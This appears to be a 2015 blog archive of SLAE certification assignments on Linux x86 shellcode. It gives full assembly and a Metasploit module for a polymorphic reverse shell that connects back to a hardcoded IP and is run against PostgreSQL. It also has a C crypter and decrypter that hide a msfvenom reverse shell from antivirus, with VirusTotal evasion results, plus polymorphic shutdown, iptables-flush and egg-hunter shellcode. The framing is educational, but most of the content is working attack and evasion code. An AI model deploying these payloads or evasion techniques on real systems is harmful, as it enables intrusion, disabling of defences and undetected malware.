Network Filter: 2015

Wednesday, 12 August 2015

SLAE Bonus #1: Polymorphic Reverse Shell

For my SLAE (Securitytube Linux Assembly Expert) certification exam, I have to blog my 7 assignments. Below is a bonus exercise I added about creating a polymorphic reverse shell metasploit module. Code can be found at my GitHub SLAE repository.

BONUS1. POLYMORPHIC REVERSE SHELL
___________________________________________________

I was very interested by doing a polymorphic version of my reverse shell shellcode done in assignement 2, and create a metasploit module from it. You can find below the assembly of the shellcode, using same techniques than previously talked, so I will not explain them again:

 
; Title: Polymorphic Linux x86 Reverse Shell Shellcode (126 bytes)
; Author: Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:
  ; Socket creation and handling with socketcall()
        ; socketcall(int call, unsigned long *args)

        ; 1 - creating socket
        ; int socket(int domain, int type, int protocol)
        ; socketfd = socket(2, 1, 0)

        ; eax = 0x66 = socketcall()
        ; ebx = 0x1 = socket()
        ; ecx = ptr to socket's args

        xor ebx, ebx                     ; zero out ebx
        mul ebx                      ; implicit operand eax: zero out eax
        mov al, 0x33
        add al, 0x33                     ; 0x66 = 102 = socketcall()
        mov [esp-4], dword ebx   ; push ebx, 3rd arg: socket protocol = 0
        sub esp, 0x4

        mov bl, 0x1                      ; ebx = 1 = socket() function
        push byte 0x1                    ; 2nd arg: socket type = 1 (SOCK_STREAM)
        push byte 0x2                    ; 1st arg: socket domain = 2 (AF_INET)
        mov ecx, esp                     ; copy stack structure's address to ecx (pointer)
        int 0x80                         ; eax = socket(AF_INET, SOCK_STREAM, 0)

         ; 2 - dup2
        ; int dup2(int oldfd, int newfd)
        ; duplicate our socketfd into fd from 2 to 0  (stdin = 0, stdout = 1, stderror = 2)
        ; stdin/stdout/stderror become the TCP connection

        ; eax = 0x3f = dup2()
        ; ebx = socketfd
        ; ecx = fd (from 2 to 0)

  ;xchg eax, ebx   ; ebx = socketfd, eax = 1
        mov ebx, eax
        mov al, 0x1
        pop ecx     ; ecx = 2 (loop count)
        inc ecx
        pxor mm0, mm1
        dec ecx
dup_jump:
        mov al, 0x4f    ; eax = 63 = dup2()
        sub al, 0x10
        int 0x80    ; dup2(socketfd, ecx)
        inc ecx     ; decrement ecx from stderror to stdin
        sub ecx, 0x2
        jns dup_jump    ; loop until ZF is set

        ; 3 - connect
        ; int connect(int sockfd, const struct sockaddr *addr[sin_family, sin_port, sin_addr], socklen_t addrlen)
        ; eax = connect(socketfd, [2, port, IP], 16)
        ; returns 0 on success

        ; eax = 0x66 = socketcall()
        ; ebx = 0x3 = connect()
        ; ecx = ptr to bind's args

        mov al, 0x33                     ; 0x66 = 102 = socketcall()
        add al, 0x33

        push dword 0x80f1a8c0            ; 192.168.241.128 Remote IP address
        push word 0x611e                 ; Remote port
        push word 0x0002                 ; sin_family = 2 (AF_INET)
        ;mov ecx, esp   ; ecx = ptr to *addr structure
        xchg ecx, esp
        mov esp, ecx

        push byte 16                     ; addr_len = 16 (structure size)
        push ecx    ; push ptr of args structure
        push ebx    ; ebx = socketfd

        mov bl, 0x4                      ; ebx = 3 = connect()
        dec bl
        mov ecx, esp                     ; save esp into ecx, points to socketfd

        fldz
        int 0x80                         ; eax = connect(socketfd, *addr[2, 7777, IP], 16) = 0 (on success)



        ; 4 - execve /bin/sh
        ; execve(const char *filename, char *const argv[filename], char *const envp[])
        ; execve(/bin//sh, &/bin//sh, 0)

        ; eax = 0xb = execve()
        ; ebx = *filename
        ; ecx = *argv
        ; edx = *envp

        xor eax, eax
        push edx    ; edx = 0x00000000

        ;push dword 0x68732f2f           ; push //sh
        ;push dword 0x6e69622f           ; push /bin (=/bin//sh)
        mov ebx, 0x57621e1e
        add ebx, 0x11111110
        push ebx
        inc dword [esp]

        mov ebx, 0x4c47400c
        add ebx, 0x22222222
        push ebx
        inc dword [esp]

        mov ebx, esp                     ; ebx =  ptr to /bin//sh into ebx
        push edx                         ; edx = 0x00000000
        mov edx, esp    ; edx = ptr to NULL address
        push ebx                         ; pointer to /bin//sh. Stack = 0X00, /bin//sh, 0X00000000, &/bin//sh
        mov ecx, esp                     ; ecx points to argv
        mov al, 0xb
        int 0x80                         ; execve /bin/sh

Then I made an executable from it, and used a python script I built to convert an objdump disassembly to a metasploit clean module format, that can be inserted into a metasploit module:

#!/usr/bin/python

# Title: ELF to Metasploit converter
# Author: Guillaume Kaddouch
# SLAE-681

import sys, os

try:
    file = sys.argv[1]
except:
    print "you must submit a filename."
    exit()

os.system("objdump -d " + file + " -M intel > ./tmp")

p = open(file + ".payload", "w")
with open("./tmp", "r") as f:
    for line in f:
        r = line.split('\t')
        converted = ""

        if len(r) == 3:
            opcode = r[1].replace(" ", "")
            asm = r[2].replace("   ", " ")
            asm.replace("  ", " ")
            asm = asm[:-1]

            index = 0
            while index < len(opcode):
                converted += "\\x" + opcode[index:index+2]
                index = index + 2

            converted = '  \t    "' + converted + '"' + ' ' * (40 - len(converted))
            buffer = converted + '+#   ' + asm 
            print buffer
            p.write(buffer + '\n')
f.close()
p.close()

How to use it (extract):

Then on Kali Linux, create an msf folder into the user's directory:
mkdir -p ~/.msf4/modules/payloads/singles/linux/x86/

Create the payload module, inserting the python script output
nano ~/.msf4/modules/payloads/singles/linux/x86/poly_shell_reverse.rb

Final module looks like this:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

  CachedSize = 126

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Polymorphic Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => 'Guillaume Kaddouch - SLAE-681',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'LHOST'    => [ 52, 'ADDR' ],
              'LPORT'    => [ 58, 'n'    ],
            },
          'Payload' =>
      "\x31\xdb"                                +#   xor  ebx,ebx
       "\xf7\xe3"                                +#   mul  ebx
       "\xb0\x33"                                +#   mov  al,0x33
       "\x04\x33"                                +#   add  al,0x33
       "\x89\x5c\x24\xfc"                        +#   mov  DWORD PTR [esp-0x4],ebx
       "\x83\xec\x04"                            +#   sub  esp,0x4
       "\xb3\x01"                                +#   mov  bl,0x1
       "\x6a\x01"                                +#   push 0x1
       "\x6a\x02"                                +#   push 0x2
       "\x89\xe1"                                +#   mov  ecx,esp
       "\xcd\x80"                                +#   int  0x80
       "\x89\xc3"                                +#   mov  ebx,eax
       "\xb0\x01"                                +#   mov  al,0x1
       "\x59"                                    +#   pop  ecx
       "\x41"                                    +#   inc  ecx
       "\x0f\xef\xc1"                            +#   pxor mm0,mm1
       "\x49"                                    +#   dec  ecx
       "\xb0\x4f"                                +#   mov  al,0x4f
       "\x2c\x10"                                +#   sub  al,0x10
       "\xcd\x80"                                +#   int  0x80
       "\x41"                                    +#   inc  ecx
       "\x83\xe9\x02"                            +#   sub  ecx,0x2
       "\x79\xf4"                                +#   jns  8048083 
       "\xb0\x33"                                +#   mov  al,0x33
       "\x04\x33"                                +#   add  al,0x33
       "\x68\xc0\xa8\xf1\x80"                    +#   push 0x80f1a8c0
       "\x66\x68\x1e\x61"                        +#   pushw  0x611e
       "\x66\x6a\x02"                            +#   pushw  0x2
       "\x87\xcc"                                +#   xchg esp,ecx
       "\x89\xcc"                                +#   mov  esp,ecx
       "\x6a\x10"                                +#   push 0x10
       "\x51"                                    +#   push ecx
       "\x53"                                    +#   push ebx
       "\xb3\x04"                                +#   mov  bl,0x4
       "\xfe\xcb"                                +#   dec  bl
       "\x89\xe1"                                +#   mov  ecx,esp
       "\xd9\xee"                                +#   fldz 
       "\xcd\x80"                                +#   int  0x80
       "\x31\xc0"                                +#   xor  eax,eax
       "\x52"                                    +#   push edx
       "\xbb\x1e\x1e\x62\x57"                    +#   mov  ebx,0x57621e1e
       "\x81\xc3\x10\x11\x11\x11"                +#   add  ebx,0x11111110
       "\x53"                                    +#   push ebx
       "\xff\x04\x24"                            +#   inc  DWORD PTR [esp]
       "\xbb\x0c\x40\x47\x4c"                    +#   mov  ebx,0x4c47400c
       "\x81\xc3\x22\x22\x22\x22"                +#   add  ebx,0x22222222
       "\x53"                                    +#   push ebx
       "\xff\x04\x24"                            +#   inc  DWORD PTR [esp]
       "\x89\xe3"                                +#   mov  ebx,esp
       "\x52"                                    +#   push edx
       "\x89\xe2"                                +#   mov  edx,esp
       "\x53"                                    +#   push ebx
       "\x89\xe1"                                +#   mov  ecx,esp
       "\xb0\x0b"                                +#   mov  al,0xb
       "\xcd\x80"                                 #   int  0x80

        }
      ))
  end

end

Notice the offset of LHOST and LPORT that must be modified according to your payload. Offset begins at 0, first opcode, and goes up. To test the payload, I choosed to exploit my local PostgreSQL service, by modifying its configuration file to trust local connections, to not requiring authentication. That would be the same case in a real-case scenario where a PostgreSQL installation would be found with default or weak credentials.

Checking our payload information:

Checking all options are set:
set RHOST 127.0.0.1
set LHOST 10.0.0.56

Now exploiting!

Note that setting RHOST to 127.0.0.1 can often gives a Metasploit error about the address being reserved. If you have the problem, set PostgreSQL to listen on the local IP address, and set your address (10.0.0.56 in the above example) as RHOST.

We can see that our polymorphic reverse shell metasploit module is working perfectly, IP address and port are modified in place.

Thanks for reading.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-681

Tuesday, 11 August 2015

SLAE Assignment #7: Custom Crypter

For my SLAE (Securitytube Linux Assembly Expert) certification exam, I have to blog my 7 assignments. Below is the last exercise requested about creating a custom crypter and decrypter. Code can be found at my GitHub SLAE repository.

7.1 CUSTOM CRYPTER
___________________________________________________

Doing his own crypter using a custom encryption is not advised as it is required to be a skilled cryptographer and mathematician to create a strong algorithm. If I have still choosen to create my own algorithm, it was more about having fun doing the required exercise than to reach strong cryptography standard :-) A crypter is written in a higher language than assembly as it would take too much opcodes to be useful in assembly for a shellcode (shellcode would be too big). A crypter is geared toward encrypting executables, but we can still insert our shellcode. Below we will encrypt our previous shellcode displaying "Egg Mark" on screen, but it could be any heavy shellcode instead. Below is a crypter written in C, notice we add \x90 at the end of the shellcode, it will be a marker used by XOR decoding in the decrypter:

 /* 
Custom Crypter XOR / NOT / XOR / INC / Swapping
Author: Guillaume Kaddouch
SLAE-681
*/

#include 
#include 
#include 

// Write "Egg Mark" and exit
unsigned char shellcode[] = \
"\x31\xdb\xf7\xe3\xb0\x04\x6a\x0a\x68\x4d\x61\x72\x6b\x68\x45"
"\x67\x67\x20\xb3\x01\x89\xe1\xb2\x09\xcd\x80\xb0\x01\xcd\x80"
"\x90"; // shellcode end mark;

int shellcode_len=31;

void display(unsigned char* buffer, int buffer_len){
    int counter;
    unsigned char data_byte;

    for (counter=0; counter< buffer_len; counter++)
    {
        data_byte = buffer[counter];
        printf("\\x%02x", data_byte);
    }

}

int main()
{
 int counter;
 int xor_key;
 unsigned char temp;
        unsigned char encrypted[shellcode_len];
        unsigned char decrypted[shellcode_len];

 printf("Shellcode:\n");
 display((unsigned char*)shellcode, shellcode_len);


 /* ---------------- Encryption code ---------------- */
        for (counter=0; counter < shellcode_len; counter++){
  if (shellcode[counter] == 0xaa || (~(shellcode[counter] ^ 0xaa)) == 0xbb){ // XOR = NULL
   printf("Forbidden character in plain or encrypted shellcode found \\x%02x, exiting.", shellcode[counter]);
   exit(0);
  }
  // Encryption of 'A' => A XOR 0xaa | NOT | XOR 0xbb | INC
                encrypted[counter] = (~(shellcode[counter] ^ 0xaa)) ^ 0xbb;
  if (encrypted[counter] < 0xff){
   encrypted[counter] = encrypted[counter] + 0x1;
  }
        }

 // Swapping pair of bytes, e.g: \xda\xef \x31\x56 -> \xef\xda \x56\x31
 for (counter=1; counter < (shellcode_len-1); counter=counter+2){
  // swap two bytes
                temp = encrypted[counter];
         encrypted[counter] = encrypted[counter-1];
                encrypted[counter-1] = temp;

 }

 printf("\n\nEncrypted shellcode:\n");
 display((unsigned char*)encrypted, shellcode_len);

 printf("\n\n");
     return 0;
}

There is two stages for encrypting the intial shellcode, first make it pass trough some bitwise encoding instructions, then swap pair of bytes all along. Notice XOR is used twice at two different times with two different keys. Below is the output of the crypter:

The decrypter is more interesting, in the way it has one of the XOR key hardcoded, but not the other. That means it has to brute force one of the keys, in the same logic than Hyperion (known AES Crypter).


/* 
Custom Decrypter XOR / NOT / XOR / INC / Swapping
Author: Guillaume Kaddouch
SLAE-681
*/

#include 
#include 
#include 

// Write "Egg Mark" and exit
unsigned char encrypted[] = \
"\x36\xe0\x0e\x1a\xeb\x5f\xe5\x85\xa4\x87\x9d\x90\x87\x86\x8a\xac\xcf\x8a\xf0\x5e\x10\x68\xe8\x5d\x6f\x24\xf0\x5f\x6f\x24\x7f";

int shellcode_len=31;

void display(unsigned char* buffer, int buffer_len){
 int counter;
     unsigned char data_byte;

     for (counter=0; counter< buffer_len; counter++)
     {
         data_byte = buffer[counter];
         printf("\\x%02x", data_byte);
     }
}

int main()
{
 int counter;
 int xor_key;
 unsigned char temp;
        //unsigned char encrypted[];
        unsigned char decrypted[shellcode_len];

 printf("\n[*] Encrypted Shellcode: ");
 display((unsigned char*)encrypted, shellcode_len);

 /* ---------------- Decryption code ---------------- */

 printf("\n[*] Brute forcing XOR key... ");
 for (xor_key = 1; xor_key < 255; xor_key++)
        {
                if ( (unsigned char)((~((encrypted[shellcode_len-1] - 0x01) ^ xor_key)) ^ 0xaa)  == 0x90 ){
   printf("XOR key found \\x%02x\n", xor_key);
   break; // XOR key found
                }
        }


 // Swapping pair of bytes, e.g: \xda\xef \x31\x56 -> \xef\xda \x56\x31
 for (counter=1; counter < (shellcode_len-1); counter=counter+2){
                // swap two bytes
                temp = encrypted[counter];
                encrypted[counter] = encrypted[counter-1];
                encrypted[counter-1] = temp;

        }

        for (counter=0; counter < shellcode_len; counter++)
        {
  if (encrypted[counter] > 0x00){
                        encrypted[counter] = encrypted[counter] - 0x1;
                }
                decrypted[counter] = (~(encrypted[counter] ^ xor_key)) ^ 0xaa;

        }

  printf("[*] Decrypted shellcode: ");
        display((unsigned char*)decrypted, shellcode_len);

 printf("\n\n[*] Jumping to Shellcode...\n");
 int (*ret)() = (int(*)())decrypted;
        ret();

}

Now we can try to run it to see what happens:

As we can see, the XOR key is successfully brute forced, the shellcode correctly decrypted, and then executed. Ok so, is it finished yet? Not if we want to check if it is any effective at lurring antivirus! Let's take a classic linux/x86/shell_reverse_tcp from Metasploit:

msfvenom -p linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.1 -e x86/shikata_ga_nai -b "\x00\xaa\xbb" -f c

Then we put the shellcode in two tests file: one in "avtest.c" being a clear text unencoded/unencrypted shellcode, and one in our CustomCrypter. We will post them both to VirusTotal and see what happens. Our first unprotected file:

We ensure the file is working:

Then we pass it trough our encrypter (just modifying the shellcode and shellcode lenght):

Then we copy the encrypted shellcode into our decoder:

We test the file is working:

Ok now we have two working files, one unprotected and the other encrypted. Let's submit them to VirusTotal:

Unprotected file: linux shellcode detected by 2 AV:

Encrypted file: linux shellcode not detected!

The shellcode I have choosen was not well detected at first, so it is not the best test one could do. However it shows that creating a custom crypter, even very basic, can be effective at not being detected. I did the test again with the same payload not encoded with x86/shikata_ga_nai, and 5 antivirus detected the unprotected file, while none caught the custom crypter.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-681

SLAE Assignment #6: Polymorphism

For my SLAE (Securitytube Linux Assembly Expert) certification exam, I have to blog my 7 assignments. Below is the sixth exercise requested about modifying three shellcode to add polymorphism. Code can be found at my GitHub SLAE repository.

6.1 SHUTDOWN SHELLCODE
___________________________________________________

I selected as first shellcode from shell-storm a "shutdown" one: http://shell-storm.org/shellcode/files/shellcode-876.php

Disassembled code is already given on the shellcode page. Before presenting a polymorphic version of it, let's analyse it first. All comments are on the code. Available also on GitHub:


; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)

; Analysis by: Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:
 ;int execve(const char *filename, char *const argv[], char *const envp[]

 xor eax,eax   ; zero out eax
 xor edx,edx   ; zero out edx
 push eax   ; push NULL terminating string
 push word 0x682d  ; \x2d\x68 = '-h'
 mov edi,esp   ; edi = *ptr '-h'
 push eax   ; push NULL
 push byte 0x6e   ; \x6e = 'n'
 mov word [esp+0x1],0x776f ; \x6f\x55 = 'ow'
 mov edi,esp   ; edi = *argv '-h now'
 push eax   ; push NULL
 push dword 0x6e776f64  ; = 'down'
 push dword 0x74756873  ; = 'shut'
 push dword 0x2f2f2f6e  ; = 'n///'
 push dword 0x6962732f  ; = '/sbi'
 mov ebx,esp   ; ebx = *filename '/sbin///shutdown' 0x00

 push edx   ; push NULL on stack
 push esi   ; value ??
 push edi   ; edi = *argv '-h now'
 push ebx   ; *filename '/sbin///shutdown' 0x00
 mov ecx,esp   ; ecx = *argv[*filename '/sbin///shutdown' '-h'

 ; ebx = *filename
 ; ecx = *argv[*filename, *'-h now']
 ; edx = *envp = 0x00

 mov al,0xb   ; execve() syscall number
 int 0x80   ; execve(*/sbin///shutdown, *-h now, 0x00)

This shellcode is basically doing an execve(shutdown -h), in 56 bytes. Now, it's time to make a polymorphic version of it. Polymorphism is a way to modify a shellcode/program as to make it look like different, while still keeping the same functionalities. The purpose is to evade traditional AV/IDS signatures by modifying the shellcode. The more polymorphism added, the greater the final size will be. Therefore there is a trade-off to find between polymorphism and shellcode size.

The first question to ask ourself, is what in my current shellcode could be fingerprinted to make a signature? The first obvious answer is the strings: here we have "/sbin/shutdown -h". So in this first exercise, we will focus on scrambling the strings. To do that, I made a simple XOR encoding python program, that you can see below:


#!/usr/bin/python

# Title: XOR encoder
# File: xorencoder.py
# Author: Guillaume Kaddouch
# SLAE-681

import sys

shellcode = (
"\x77\x6f\x6e"                   # = now

#push dword 0x6e776f64           ; = 'down'
#"\x6e\x77\x6f\x64"

#push dword 0x74756873           ; = 'shut'
#"\x74\x75\x68\x73"

#push dword 0x2f6e6962           ; = '/nib'
#"\x2f\x6e\x69\x62"

#push word 0x732f      
#"\x73\x2f"
)

xor_key = 0xAA

encoded = ""
encoded2 = ""

print "[*] Encoding shellcode..."

for x in bytearray(shellcode):
    # XOR encoding
    y = x^xor_key
    encoded += '\\x'
    encoded += '%02x' % y

    encoded2 += '0x'
    encoded2 += '%02x,' %y

print "hex version : %s" % encoded
print ""
print "nasm version : %s" % encoded2
print ""
print 'Len: %d' % len(bytearray(shellcode))

As an example of encoding "now" with 0xAA:

Now the whole polymorphic version:

 
; Polymorphic version of http://shell-storm.org/shellcode/files/shellcode-876.php
; 83 bytes (original 56 bytes)
; Kaddouch Guillaume
; SLAE-681


global _start

section .text

_start:
  ;int execve(const char *filename, char *const argv[], char *const envp[]

 xor eax, eax    ; zero out eax
 push eax    ; push NULL terminating string

 push word 0xc287   ; XORed '-h' with 0xAA
 xor word [esp], 0xaaaa   ; XOR back string to clear text '-h'
 push eax    ; push NULL
 push dword 0x776f6eAA   ; = 'now'
 mov [esp], byte al   ; \x00 = NULL
 mov edi, esp    ; edi = *'-h now'

 push eax    ; push NULL

 mov ebx, dword 0xc4ddc5ce   ; XORed 'down' with 0xAA
 xor ebx, 0xaaaaaaaa    ; XOR back the string to clear text
 push ebx     ; string 'down'

 mov ebx, dword 0x63645762   ; encoded 'shut' decreased by 0x11111111
 add ebx, 0x11111111    ; convert back the string to clear text
 push ebx     ; string 'shut'

        mov ebx, dword 0x85c4c3c8   ; XORed 'bin/' with 0xAA
 xor ebx, 0xaaaaaaaa    ; XOR back the string to clear text
 push ebx     ; string 'bin/'

 mov bx, 0x6129     ; encoded '/s' decreased by 0x1206
 add bx, 0x1206     ; convert back the string to clear text
 push bx      ; string '/s'

 ; clear string on stack = /sbin/shutdown

 mov ebx, esp    ; ebx = *filename '/sbin///shutdown' 0x00

 push eax
 push edi    ; edi = *argv '-h now'
 push ebx    ; *filename '/sbin///shutdown' 0x00
 mov ecx,esp    ; ecx = *argv[*filename '/sbin///shutdown' '-h'

 ; ebx = *filename
 ; ecx = *argv[*filename, *'-h now']
 ; edx = *envp = 0x00

 mov al,0xb    ; execve() syscall number
 int 0x80    ; execve(*/sbin///shutdown, *-h now, 0x00)

You can notice that we used various methods to encode the string chunks: 1) XOR 0xaa encoding, 2) INC 0x11111111, 3) ADD 0x1206, 4) and no encoding for the string "now". The point is to avoid a classic encoding/decoding loop that could also be fingerprinted. By using multiple methods, we of course also increase the shellcode size, from 56 bytes to 83 bytes. I am sure you can understand I cannot show you any screenshot of a "working" shutdown shellcode :-) I can at least show the decoding happening in a debugguer:

push word 0xc287 ; XORed '-h' with 0xAA

xor word [esp], 0xaaaa ; XOR back string to clear text '-h'

mov ebx, dword 0xc4ddc5ce ; XORed 'down' with 0xAA

xor ebx, 0xaaaaaaaa ; XOR back the string to clear text

push ebx ; string 'down'

We can notice that the strings are rendered correctly.

6.2 IPTABLES -F SHELLCODE
___________________________________________________

I selected as second shellcode from shell-storm, an "iptables flush" one: http://shell-storm.org/shellcode/files/shellcode-825.php

Disassembled code is already given on the shellcode page. Before presenting a polymorphic version of it, let's analyse it first. All comments are on the code. Available also on GitHub:

 
; Linux/x86 iptables --flush 43 bytes
; Author : Hamza Megahed

; Analysis by Guillaume Kaddouch
; SLAE-681



global _start

section .text

_start:

  ; int execve(const char *filename, char *const argv[], char *const envp[]);


 xor eax,eax     ; zero out eax
 push eax     ; push NULL terminating string on stack
 push word 0x462d    ; push '-F' on stack
 mov esi,esp     ; esi = *ptr to '-F' argument

 push eax     ; push NULL terminating string on stack
 push dword 0x73656c62    ; bles
 push dword 0x61747069    ; ipta
 push dword 0x2f6e6962    ; bin/
 push dword 0x732f2f2f    ; ///s
 mov ebx,esp     ; ebx = *ptr to '///sbin/iptables'

 push eax     ; push NULL
 push esi     ; *ptr to -F
 push ebx     ; 1st arg: *filename ///sbin/iptables
 mov ecx,esp     ; 2nd arg: *argv [*filename, -F]
 mov edx,eax     ; 3rd arg: *envp = 0x00

 mov al,0xb     ; 0xb = execve()
 int 0x80     ; execve(*filename, *argv, *envp)

This shellcode is basically doing an execve(iptables -F), in 43 bytes. Now, it's time to make a polymorphic version of it. As the previous shellcode, we will make sure the string is no longer stored in whole plain text to avoid fingerprinting. We will use other tricks as well we didn't use in the previous polymorphic shellcode.

 
; Polymorphic version of "iptables -flush" shellcode from http://shell-storm.org/shellcode/files/shellcode-825.php
; 61 bytes (original shellcode 43 bytes)
; Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:

  ; int execve(const char *filename, char *const argv[], char *const envp[]);

 pxor mm0, mm1     ; decoil instruction

 xor eax,eax     ; zero out eax
 mov [esp], eax     ; push NULL on stack, manually
 sub esp, 0x4     ; decrement ESP manually

 push word 0x462d    ; push '-F' on stack
 mov esi,esp     ; esi = *ptr to '-F' argument

 push eax     ; push NULL terminating string on stack
 push dword 0x73656c62    ; 'bles'

 mov edx, 0x50636058    ; encoded 'ipta' string
 add edx, 0x11111011    ; convert back 'ipta' to clear text
 push edx

 push dword 0x2f6e6962    ; bin/
 push dword 0x732f2f2f    ; ///s
 mov ebx,esp     ; ebx = *ptr to '///sbin/iptables'

 push eax     ; push NULL
 push esi     ; *ptr to -F

 cdq      ; decoil instruction

 push ebx     ; 1st arg: *filename ///sbin/iptables
 mov ecx,esp     ; 2nd arg: *argv [*filename, -F]
 mov edx,eax     ; 3rd arg: *envp = 0x00

 mov al,0xa     ; syscall we won't call
 inc al      ; 0xa + 0x1 = 0xb = execve()
 int 0x80     ; execve(*filename, *argv, *envp)

In this example, we encode only part of the "/sbin/iptables -F" string, which is "/sbin/X`cPbles -F". The purpose is to not oversize our polymorphism, to let room for other polymorphic instructions. It may not be necessary to encode the whole command, as a fingerprint on "iptables" string would already not match. Also, it gives us room to use other methods. First one is to add junk instructions in the middle of the code, that does nothing to accomplish our purpose of flushing iptables. It is the case of the MMX instructions added or the "cdq" instruction. Also, instead of doing a clean "push" instruction, we can do the same manually by copying data on the stack, and then adjusting ESP. It still does the same, but further move our shellcode away from a signature for the original version. Finally, the syscall number copied into eax at the end is the wrong one, and is corrected before the syscall occurs. They are all tiny modifications that together modify the fingerprint of the shellcode. Now we can test our shellcode, first we create an iptables rule:

Now let's assemble our shellcode and execute it. Finally check our rules:

We can see that our ACCEPT rule has been correctly deleted by the flush command. Execution is successful, and our shellcode is now polymorphic.

6.3 EGG HUNTER SHELLCODE
___________________________________________________

I selected as third shellcode from shell-storm, an egg hunter one: http://shell-storm.org/shellcode/files/shellcode-839.php

Only hexadecimal shellcode is given on the link, we have to disassemble it first:

Now let's analyse it:

 
 ; Title: Egg Hunter Shellcode
 ; Author: Geyslan G. Bem, Hacking bits
 
; Analysis by Guillaume Kaddouch
; SLAE-681


 global _start

section .text

_start:

 cld     ; clear DF flag
 xor ecx,ecx    ; zero out ecx
 mul ecx     ; zero out eax and edx

next_page:

 or dx,0xfff    ; page aligment: if memory is invalid, skip to the next page

next_address:

 inc edx    ; check next memory address
 push byte 0x21    ; 0x21 = 33 = access() syscall
 pop eax
 lea ebx, [edx+0x4]   ; 1st arg: ebx = next memory to check (=edx+4)
 int 0x80    ; eax = access(*memory, 0x0)
 cmp al,0xf2    ; if al = 0xf2, page invalid so skip it, jump to next page (ZF = 1)
 jz next_page

 mov eax,0x50905090   ; if address not invalid, store egg signature into eax
 mov edi,edx    ; store current memory content into edi
 scasd     ; compare edi & eax, and set ZF = 1 if equal (egg found). Increment edi by 4.
 jnz next_address   ; if not our egg, jump to next address
 scasd     ; if it is our egg, check next address is equal to our egg too
 jnz next_address  ; if not, jump to the next address, going first to a decoil jump
 jmp edi     ; our egg was found, jump to shellcode (edi+8)

This egg hunter inspects the whole process memory looking for the egg, twice, and then jump to the shellcode. Now let's try to make a polymorphic version of it:

 
; Polymorphic version or egg hunter from http://shell-storm.org/shellcode/files/shellcode-839.php
; 57 bytes (original size 38 bytes)
; Guillaume Kaddouch
; SLAE-681


global _start

section .text

_start:

 xor eax, eax   ; zero out eax
 xor edx, edx   ; zero out edx
 cld    ; clear DF flag
 xor ecx,ecx   ; zero out ecx

next_page:

 fldz
 or dx,0xfff   ; page aligment: if memory is invalid, skip to the next page

next_address:

 add edx, 0x1   ; check next memory address
 push byte 0x20   ; 0x20 = 32 = getpid() syscall
 pop eax
 lea ebx, [edx+0x6-0x2]  ; 1st arg: ebx = next memory to check (=edx+4)
 inc eax    ; 0x21 = 33 = access() syscall
 int 0x80   ; eax = access(*memory, 0x0)
 cmp al,0xf2   ; if al = 0xf2, page invalid so skip it, jump to next page (ZF = 1)
 jz next_page

 mov eax,0x40804080  ; if address not invalid, store obfuscated egg signature into eax
 add eax, 0x10101010  ; fix egg signature = 0x50905090
 mov edi,edx   ; store current memory content into edi
 scasd    ; compare edi & eax, and set ZF = 1 if equal (egg found). Increment edi by 4.
 jnz next_address  ; if not our egg, jump to next address
 scasd    ; if it is our egg, check next address is equal to our egg too
 jnz decoil   ; if not, jump to the next address, going first to a decoil jump
 jmp edi    ; our egg was found, jump to shellcode (edi+8)

decoil:
 mov dword esi, 0x11112345 ; I like moving data around for no reason
 jmp short next_address  ; now get back to work

In this polymorphic version, we combine many methods we used before. First, we modify the begining of the shellcode by using different instructions to zero out registers. We insert a junk instruction in between, and we push a wrong syscall value into eax, before correcting it further (and not immediately this time). The LEA instruction is slighly modified, and the egg signature is obfuscated before being moved into eax register, and is fixed just after. Finally, an additional jump has been added to modify the workflow of the shellcode, jumping at a place doing a bogus instruction, before jumping back where it should, following execution. The shellcode increased from 38 bytes to 57 bytes in the process. Now let's check it works:

Putting the shellcode into a C file, compile it and execute it:

We can see that our polymorphic shellcode is working and jumps to the target shellcode, displaying "Egg Mark" on the screen. We can test removing part of the egg signature on the target shellcode and see what happens:

The program seems to loop indefinitely, as it never finds the egg signature twice in a row.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-681

Monday, 10 August 2015

SLAE Assignment #5: Metasploit Shellcode Analysis

For my SLAE (Securitytube Linux Assembly Expert) certification exam, I have to blog my 7 assignments. Below is the fifth exercise requested about analysing three Metasploit Linux x86 shellcode of my choice. Code can be found at my GitHub SLAE repository.

5.1 METASPLOIT ADDUSER SHELLCODE
___________________________________________________

I decided to analyse the Metasploit linux/x86/adduser shellcode. I booted my Kali Linux VM, and used msfvenom to have the shellcode of this payload:

Then, I copy/pasted it into an text file to put the shellcode on one line, allowing me in the next step to disassemble it:

We can notice that in the middle of the shellcode there is instructions that do not seem to make any sense for adding a user. To gather more information, I tried to use Libemu:

However Libemu stops in the middle of the process, instead of giving a full analysis with a C code at the end. In ndisasm output, we can follow all the instructions until an interesting "CALL" which jumps further in the code, skipping an entire block of opcodes. This sounds like CALL POP technique, without the initial jump. That would mean that the opcode block skipped is a string for which the address is needed. A reason to do it that way is to optimize the code size, while decreasing readibility. To check that theory, I coded a python script to receive an opcode input, and translate it to string:

 #!/usr/bin/python

# Convert shellcode hex input as string
# Author: Guillaume Kaddouch
# SLAE-681

import sys

try:
    if sys.argv[1]:
        arg1 = sys.argv[1]
        string = arg1

    if sys.argv[2] == "null":
        string += '\n'
except:
    toto = "Nothing"
